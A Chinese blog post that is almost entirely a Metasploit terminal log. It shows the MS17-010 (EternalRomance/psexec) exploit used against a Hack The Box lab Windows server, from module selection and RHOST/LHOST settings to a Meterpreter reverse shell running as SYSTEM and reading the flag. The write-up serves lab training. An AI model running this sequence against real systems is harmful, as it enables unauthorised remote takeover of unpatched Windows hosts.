HgTrojan blogmsf利用ms17_010
┌─[✗]─[root@parrot]─[/home/jiang/Desktop]
└──╼ #msfconsole
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.3.5-dev ]
+ -- --=[ 2296 exploits - 1202 auxiliary - 410 post ]
+ -- --=[ 965 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advanced
Metasploit Documentation: https://docs.metasploit.com/
[msf](Jobs:0 Agents:0) >> search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
[msf](Jobs:0 Agents:0) >> use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/da yes List of named pipes to check
ta/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...)
or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.186.66 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set rhost 10.129.163.128
rhost => 10.129.163.128
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set lhost 10.10.16.16
lhost => 10.10.16.16
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> run
[*] Started reverse TCP handler on 10.10.16.16:4444
[*] 10.129.163.128:445 - Target OS: Windows Server 2016 Standard 14393
[*] 10.129.163.128:445 - Built a write-what-where primitive...
[+] 10.129.163.128:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.163.128:445 - Selecting PowerShell target
[*] 10.129.163.128:445 - Executing the payload...
[+] 10.129.163.128:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.129.163.128
[*] Meterpreter session 1 opened (10.10.16.16:4444 -> 10.129.163.128:49674) at 2023-11-25 19:17:06 +0800
(Meterpreter 1)(C:\Windows\system32) > shell
Process 1220 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ..
cd ..
C' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>cd ..
cd ..
C:\>cd use
cd use
The system cannot find the path specified.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\
10/05/2020 05:43 PM <DIR> inetpub
07/16/2016 05:23 AM <DIR> PerfLogs
05/16/2022 04:08 AM <DIR> Program Files
05/16/2022 04:08 AM <DIR> Program Files (x86)
10/05/2020 05:51 PM <DIR> Users
10/05/2020 05:43 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 30,157,791,232 bytes free
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users
10/05/2020 05:51 PM <DIR> .
10/05/2020 05:51 PM <DIR> ..
10/05/2020 05:51 PM <DIR> .NET v2.0
10/05/2020 05:51 PM <DIR> .NET v2.0 Classic
10/05/2020 05:51 PM <DIR> .NET v4.5
10/05/2020 05:51 PM <DIR> .NET v4.5 Classic
10/05/2020 03:18 PM <DIR> Administrator
10/05/2020 05:51 PM <DIR> Classic .NET AppPool
11/20/2016 05:24 PM <DIR> Public
0 File(s) 0 bytes
9 Dir(s) 30,157,791,232 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users\Administrator
10/05/2020 03:18 PM <DIR> .
10/05/2020 03:18 PM <DIR> ..
10/05/2020 03:18 PM <DIR> Contacts
05/16/2022 04:17 AM <DIR> Desktop
10/05/2020 03:18 PM <DIR> Documents
10/05/2020 06:08 PM <DIR> Downloads
10/05/2020 03:18 PM <DIR> Favorites
10/05/2020 03:18 PM <DIR> Links
10/05/2020 03:18 PM <DIR> Music
10/05/2020 03:18 PM <DIR> Pictures
10/05/2020 03:18 PM <DIR> Saved Games
10/05/2020 03:18 PM <DIR> Searches
10/05/2020 03:18 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 30,157,791,232 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9850-1131
Directory of C:\Users\Administrator\Desktop
05/16/2022 04:17 AM <DIR> .
05/16/2022 04:17 AM <DIR> ..
05/16/2022 03:19 AM 29 flag.txt
1 File(s) 29 bytes
2 Dir(s) 30,157,791,232 bytes free
C:\Users\Administrator\Desktop>more flag.txt
more flag.txt
HTB{MSF-W1nD0w5-3xPL01t4t10n}
C:\Users\Administrator\Desktop>^C
Terminate channel 1? [y/N] y
(Meterpreter 1)(C:\Windows\system32) > quit
[*] Shutting down Meterpreter...
所有操作都在Hack The Box学院的靶机中完成
声明
未经所有者同意,请不要攻击网站。
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
文章目录
打赏: 
支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论已关闭